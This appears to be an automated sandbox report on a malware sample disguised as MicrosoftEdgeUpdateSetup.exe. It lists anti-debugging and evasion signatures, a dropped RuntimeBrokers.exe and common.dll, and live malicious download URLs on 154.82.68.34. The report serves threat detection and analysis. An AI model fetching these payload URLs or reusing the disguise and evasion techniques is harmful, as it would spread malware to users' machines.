Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: RuntimeBrokers.exe, 00000001.00000002.2954997145.0000000000C47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0044D2F4 rdtsc 1_2_0044D2F4
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016EA6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0016EA6A
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0048621A EnterCriticalSection,SetFilePointer,GetLastError,OutputDebugStringW,WriteFile,LeaveCriticalSection, 1_2_0048621A
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0045E100 LoadLibraryW,GetProcAddress,FreeLibrary, 1_2_0045E100
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016BA2B mov eax, dword ptr fs:[00000030h] 0_2_0016BA2B
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00170268 mov eax, dword ptr fs:[00000030h] 0_2_00170268
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004DFB26 mov eax, dword ptr fs:[00000030h] 1_2_004DFB26
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016132B GetProcessHeap,__Init_thread_footer,__Init_thread_footer, 0_2_0016132B
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00168902 SetUnhandledExceptionFilter, 0_2_00168902
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016EA6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0016EA6A
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00168C03 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00168C03
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016876F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0016876F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004AE04B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_004AE04B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004BABCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004BABCA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Process created: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe "C:\Users\user\AppData\Roaming\RuntimeBrokers.exe" Jump to behavior
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00165EBB SetSecurityDescriptorDacl, 0_2_00165EBB
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00168A15 cpuid 0_2_00168A15
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_004F20F5
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: EnumSystemLocalesW, 1_2_004E6FB1
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: GetLocaleInfoW, 1_2_004AD30E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: ___crtGetLocaleInfoEx, 1_2_004AD407
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 1_2_004F179F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: GetLocaleInfoW, 1_2_004E7A01
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: EnumSystemLocalesW, 1_2_004F1A17
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: EnumSystemLocalesW, 1_2_004F1A80
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: EnumSystemLocalesW, 1_2_004F1B1B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004F1F21
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0EAA53 __EH_prolog3,InitializeCriticalSection,GetCurrentProcessId,GetCurrentThreadId,CreateNamedPipeA,CreateThread,CreateEventA, 1_2_6C0EAA53
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_0016207E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C15687C ?SetFileAuthority@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z,__EH_prolog3_GS,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,GetUserNameW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?EnableFileAccountPrivilege@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ, 1_2_6C15687C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004D8CEE _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 1_2_004D8CEE
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00408D44 GetVersionExW, 1_2_00408D44
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C10AC3B __EH_prolog3_GS,_time32,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBEHXZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?get_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QBE_KXZ,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,_wfopen,fwrite,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,_errno,fclose,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,_errno, 1_2_6C10AC3B
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C6C9C ?from_json@jsonbind@@YAHPAXABVValue@Json@@@Z, 1_2_6C0C6C9C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C6D1E ?to_json@jsonbind@@YAHPAXAAVValue@Json@@@Z, 1_2_6C0C6D1E
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C1365DE ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z, 1_2_6C1365DE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579412 Sample: MicrosoftEdgeUpdateSetup.exe Startdate: 22/12/2024 Architecture: WINDOWS Score: 60 26 Suricata IDS alerts for network traffic 2->26 28 Uses known network protocols on non-standard ports 2->28 30 AI detected suspicious sample 2->30 6 MicrosoftEdgeUpdateSetup.exe 22 2->6         started        process3 dnsIp4 22 154.82.68.34, 16653, 49730 ROOTNETWORKSUS Seychelles 6->22 14 C:\Users\user\AppData\Roaming\common.dll, PE32 6->14 dropped 16 C:\Users\user\AppData\...\RuntimeBrokers.exe, PE32 6->16 dropped 18 C:\Users\user\AppData\Local\...\common[1].dll, PE32 6->18 dropped 20 C:\Users\user\...\RuntimeBrokers[1].exe, PE32 6->20 dropped 32 Found evasive API chain checking for user administrative privileges 6->32 11 RuntimeBrokers.exe 6->11         started        file5 signatures6 process7 dnsIp8 24 134.122.134.93 BCPL-SGBGPNETGlobalASNSG United States 11->24
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
134.122.134.93
 unknown United States
64050 BCPL-SGBGPNETGlobalASNSG false
154.82.68.34
 unknown Seychelles
32708 ROOTNETWORKSUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://154.82.68.34:16653/common.dll true
    		unknown
    http://154.82.68.34:16653/RuntimeBrokers.exe true
      		unknown